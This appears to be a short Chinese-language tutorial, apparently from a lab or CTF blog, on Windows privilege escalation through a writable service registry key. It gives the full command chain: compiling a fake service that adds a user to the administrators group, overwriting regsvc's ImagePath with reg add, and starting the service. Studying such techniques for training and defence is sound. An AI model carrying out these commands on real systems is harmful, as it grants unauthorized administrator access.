windows服务之注册表提权
windows服务之注册表提权
b站上的视频教程
用户权限
NT Authority \ SYSTEM又称LocalSystem帐户是内置的Windows帐户。 它是Windows本地实例上功能最强大的帐户(比任何管理员帐户都更强大)。 大多数系统级别(Windows Services)服务和其他一些第三方服务都在帐户中运行
NT Authority \ SYSTEM 是Builtin\Administrator 是系统管理员之一
NT AUTHORITY\INTERACTIVE
交互式用户是当前登录到运行COM服务器的计算机的用户。 如果将身份设置为交互式用户,并且服务器将其类工厂注册为多用途,则所有客户端都将使用服务器的同一实例。
注册表
1 |
|
生成伪造的服务
编译windows_service.c
cmd.exe /k net localgroup administrators user /add
x86_64-w64-mingw32-gcc windows_service.c -o x.exe
1 |
|
reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d c:\temp\x.exe /f
sc start regsvc
net user user